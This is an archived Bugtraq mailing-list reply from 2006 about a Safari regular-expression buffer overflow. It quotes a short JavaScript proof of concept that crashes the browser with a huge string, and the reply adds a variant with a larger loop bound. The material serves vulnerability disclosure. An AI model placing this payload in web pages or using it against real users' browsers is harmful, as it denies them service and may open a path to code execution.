Bugtraq mailing list archives

Re: Apple Safari "match" Buffer Overflow Vulnerability

From: "J. Oquendo" <sil () infiltrated net>
Date: Tue, 14 Nov 2006 14:59:37 -0500

jbh_cg () yahoo fr wrote:

The following bug was tested on the latest version of Safari on a fully-patched Mac OS X 10.4.
A remote attacker may exploit this issue to crash the application, effectively denying service to legitimate users. 
Successful exploitation could lead to remote code execution.

<script>
var reg = /(.)*/;
var z = 'Z';
while (z.length <= 8192) z+=z;
var boum = reg.exec(z);</script>


while (z.length <= 16384) z+=z;


--
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743

sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

Current thread:

Apple Safari "match" Buffer Overflow Vulnerability jbh_cg (Nov 14)
- Re: Apple Safari "match" Buffer Overflow Vulnerability J. Oquendo (Nov 16)